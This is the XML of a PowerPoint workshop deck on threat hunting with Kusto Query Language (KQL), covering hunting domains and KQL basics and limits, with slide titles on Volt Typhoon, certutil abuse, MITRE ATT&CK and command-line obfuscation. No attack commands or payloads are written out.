          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B30E9600-A158-D41E-3D9C-3EEBFDC10078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9043060" y="3780115"/>
            <a:ext cx="1003062" cy="1003062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2B93B06-51CE-DC97-771D-05D160DCABC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="979716" y="2032413"/>
            <a:ext cx="3335382" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>Host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>(today’s workshop)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{852275D6-C1EE-F48E-35B6-6EAE30388CEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4428308" y="2032412"/>
            <a:ext cx="3335382" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>E.g. Firewall Logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADE0F6FA-D1C5-2C4B-46F4-B670738D7621}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7876902" y="2032412"/>
            <a:ext cx="3335382" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>E.g. Microsoft Azure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2169955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D98476-7A2E-653D-E58B-2E641DA167F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A389CFD-4D10-69D4-EC3B-799F6D4026D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314824" y="735106"/>
            <a:ext cx="10053763" cy="2928470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is Kusto Query Language?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCD12406-93E1-3215-035D-20CE5046B064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1350682" y="4870824"/>
            <a:ext cx="10005951" cy="1458258"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>An extremely fast database querying language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3524439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5A0185-5EE3-0A24-4C91-9C511B3B351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564963-C3DB-CC37-FF32-385DBD7156B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466722" y="586855"/>
            <a:ext cx="3201366" cy="3387497"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is KQL?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2163AC3-5FAF-C451-446C-8E29842B7066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4810259" y="649480"/>
            <a:ext cx="6555347" cy="5546047"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>KQL is the fast database language that all of Microsoft’s cloud tools run on, including Azure, Sentinel, and Defender XDR hunting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>It has many built in functions for fast data analytics on large datasets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>As the query language for Microsoft Sentinel, it can used both to examine logs, and to write detections. Very powerful!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>KQL has strict service limits that make it hard to get large amounts of data out of the platform:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>No more than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>64MB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> size for query results (results are compressed first)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>No more than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>500,000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> rows in Azure Data Explorer, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>100,000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> in Sentinel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12865960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1200</TotalTime>
  <Words>3481</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>267</Paragraphs>
  <Slides>56</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Aptos</vt:lpstr>
      <vt:lpstr>Aptos Display</vt:lpstr>
      <vt:lpstr>Aptos Mono</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Threat Hunting with KQL</vt:lpstr>
      <vt:lpstr>What is threat hunting?</vt:lpstr>
      <vt:lpstr>Threat hunting may be done by:</vt:lpstr>
      <vt:lpstr>Threat hunting may be done by:</vt:lpstr>
      <vt:lpstr>Why do we need to hunt?</vt:lpstr>
      <vt:lpstr>Why do we need to hunt?</vt:lpstr>
      <vt:lpstr>Different domains of threat hunting</vt:lpstr>
      <vt:lpstr>What is Kusto Query Language?</vt:lpstr>
      <vt:lpstr>What is KQL?</vt:lpstr>
      <vt:lpstr>Creating your free Azure Data Explorer cluster!</vt:lpstr>
      <vt:lpstr>Getting started with Azure Data Explorer</vt:lpstr>
      <vt:lpstr>Basics of KQL</vt:lpstr>
      <vt:lpstr>Viewing and filtering data with KQL</vt:lpstr>
      <vt:lpstr>Types of threat actors</vt:lpstr>
      <vt:lpstr>Types of threat actors</vt:lpstr>
      <vt:lpstr>Who will we be hunting for?</vt:lpstr>
      <vt:lpstr>Volt Typhoon</vt:lpstr>
      <vt:lpstr>Example activity from Volt Typhoon</vt:lpstr>
      <vt:lpstr>How do we hunt for this well?</vt:lpstr>
      <vt:lpstr>Bad “naïve” approach:</vt:lpstr>
      <vt:lpstr>Evidence in threat reports is just examples of activity</vt:lpstr>
      <vt:lpstr>What are the invariants in this activity?</vt:lpstr>
      <vt:lpstr>What are the invariants in this activity?</vt:lpstr>
      <vt:lpstr>Is just this enough?</vt:lpstr>
      <vt:lpstr>Let’s hunt for this in KQL - introducing has</vt:lpstr>
      <vt:lpstr>Has matches terms only</vt:lpstr>
      <vt:lpstr>Workshop time!</vt:lpstr>
      <vt:lpstr>Hunt target:</vt:lpstr>
      <vt:lpstr>A solution</vt:lpstr>
      <vt:lpstr>Review</vt:lpstr>
      <vt:lpstr>Time for a harder case study</vt:lpstr>
      <vt:lpstr>Volt Typhoon uses certutil… somehow</vt:lpstr>
      <vt:lpstr>Reseraching certutil abuse possibilities</vt:lpstr>
      <vt:lpstr>Certutil download possibilities</vt:lpstr>
      <vt:lpstr>Analysis after researching the command</vt:lpstr>
      <vt:lpstr>Final invariant analysis</vt:lpstr>
      <vt:lpstr>Workshop time!</vt:lpstr>
      <vt:lpstr>Review</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>How Volt Typhoon Attacks</vt:lpstr>
      <vt:lpstr>The MITRE ATT&amp;CK matrix (enterprise)</vt:lpstr>
      <vt:lpstr>ATT&amp;CK considers all phases of an attack</vt:lpstr>
      <vt:lpstr>The concept of TTPs</vt:lpstr>
      <vt:lpstr>MITRE ATT&amp;CK Uses</vt:lpstr>
      <vt:lpstr>How this influences our hunt strategy</vt:lpstr>
      <vt:lpstr>Question time!</vt:lpstr>
      <vt:lpstr>Command Line Obfuscation</vt:lpstr>
      <vt:lpstr>A simple example obfuscation technique</vt:lpstr>
      <vt:lpstr>A second example</vt:lpstr>
      <vt:lpstr>A second example, obfuscated</vt:lpstr>
      <vt:lpstr>At this point, things look bad.</vt:lpstr>
      <vt:lpstr>What would a human think of these examples?</vt:lpstr>
      <vt:lpstr>You can use unusual behaviours, such as these, as a signal.</vt:lpstr>
      <vt:lpstr>Principles of countering command line obfuscation:</vt:lpstr>
      <vt:lpstr>Thank you!</vt:lpstr>
      <vt:lpstr>Stay Connected #BlueCrew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Threat Hunting with KQL</dc:title>
  <dc:creator>JAMIE ECCLESTON</dc:creator>
  <cp:lastModifiedBy>Samuel Shedrack CHUKWUWEONU</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-12T10:38:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-13T07:46:54Z</dcterms:modified>
</cp:coreProperties>
</file>